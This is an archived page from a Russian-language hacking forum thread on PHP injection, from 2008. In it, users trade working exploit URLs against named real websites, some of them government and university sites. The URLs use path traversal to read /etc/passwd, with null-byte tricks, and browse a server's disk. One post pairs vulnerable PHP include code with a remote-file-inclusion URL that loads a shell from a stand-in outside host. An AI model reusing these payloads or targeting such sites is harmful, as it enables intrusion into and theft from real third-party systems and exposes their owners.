ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу PHP Иньекции
   
 
Страница 75 из 116 « Первая < 2565 71 72 73 74 75 76 77 78 79 85 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #741  
Старый 14.07.2008, 19:55
.Striker
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062

Репутация: 155
По умолчанию
pr 4
http://www.fonprevial.org.co/download.php?file=../../../../../../../../../../../etc/passwd

тупое читалко
https://secure4.olemiss.edu/umpolicyopen/GetPdfActive?pol=10967301&ver=active&file=../../../../../../../../../../../etc/passwd%00.pdf
 

  #742  
Старый 14.07.2008, 22:27
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию
http://badisow.49.212-215.is74.ru/userdir/message/messread.php?tm=c://windows

можно передвигаться по всему компу ...
PS:Сайт в локалке,но можно в него и с инета зайти
Это похоже не PHP инъекцмя
 

  #743  
Старый 15.07.2008, 18:51
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514

Репутация: 3313


Отправить сообщение для Chaak с помощью ICQ
По умолчанию
Цитата:
http://www.jfrealtors.com/index.php?page=../../../../etc/passwd
Все в открытую)
Цитата:
http://darryl-e.com/pagegen.php?page=[ url ]
Цитата:
http://www.grammi.edu.gr/gr/index.php?page=[ url ]
 

  #744  
Старый 15.07.2008, 19:44
.Striker
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062

Репутация: 155
По умолчанию
http://www.grammi.edu.gr/gr/index.php?page=[ url ]
это не инекция
оно просто вставляет во фрейм
 

  #745  
Старый 16.07.2008, 21:17
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию
gov, pr9
Цитата:
http://www.mbda.gov/?section_id=12&bucket_id=916&content_id=6204&well= entire_page&textsize=Medium&method=printer&portal_ document_download=true
&download_cid=6204&name=../../../../../../../../../etc/passwd&legacy_flag=false
gov, pr7
Цитата:
http://www.mass.gov/?pageID=mg2subtopic&L=4&L0=../../../../../../../../../etc/passwd%00&L1=Resident&L2=Housing
&L3=Buying+a+Home&sid=massgov2
Последний раз редактировалось aka PSIH; 16.07.2008 в 21:22..
 

  #746  
Старый 23.07.2008, 22:41
.Striker
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062

Репутация: 155
По умолчанию
http://zwgkml.harbin.gov.cn/hrb_zwgkml/file.php?filename=../../../../../../../../../../../etc/passwd
Читалко
http://www.factordinero.com.co/docs/download.php?file=download.php
 

  #747  
Старый 25.07.2008, 19:03
.Striker
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062

Репутация: 155
По умолчанию
Код:
http://www.uaemet.gov.ae/upload/filedownload_backend.php?file=../../../../../../../../../../../etc/passwd
Код:
http://www.telcat-starclub.de/cgi-bin/parse.pl?file=../../../../../../../../../../../etc/passwd
Код:
http://www.netstor.com.tw/dl.php?file=../../../../../../../../../../../etc/passwd
 

  #748  
Старый 28.07.2008, 01:00
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию
liveinternet.ru
Po vsem priznakam est' includ, jal' 4to nastroika servera ne pozvolaet vospol'zovat's9 dannoj bagoj
http://www.liveinternet.ru/stat/index.html?lang=./././en
 

  #749  
Старый 29.07.2008, 15:19
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию
ну вот смотри:

пишем:
http://www.liveinternet.ru/stat/index.html?lang=./././en
и видим вверху справа:
Цитата:
{currentName} Русский
вверху слева:

Цитата:
LiveInternet • site statistics
на английском языке.


теперь пишем так:
http://www.liveinternet.ru/stat/index.html?lang=./././en./././

это на случай, если ./ вырезается.
Видим. что язык стал русским - значит - по дефолту - произошла ошибка.

Если пишешь ./././ до имени (ну типа точка - текущий каталог) - ошибки нет


пишем:

http://www.liveinternet.ru/stat/index.html?lang=./././es

и язык испанский.

А эксплуатировать не удастся потому, что нуль-байт фильтруется, а в конце есть приставка. И в начале тоже. То есть есть возможность подключать (или читать) файлы с тем расширением, с каким и файлы с языками
 

  #750  
Старый 29.07.2008, 16:52
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию
"Работница" - журнал для семейного чтения


Уязвимый код в файле part.php:
PHP код:
include($rubr.".php"); 
Использование:
Цитата:
http://www.rabotnitsa.ru/part.php?rubr=http://www.yoursite.com/shell
 
 
Страница 75 из 116 « Первая < 2565 71 72 73 74 75 76 77 78 79 85 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ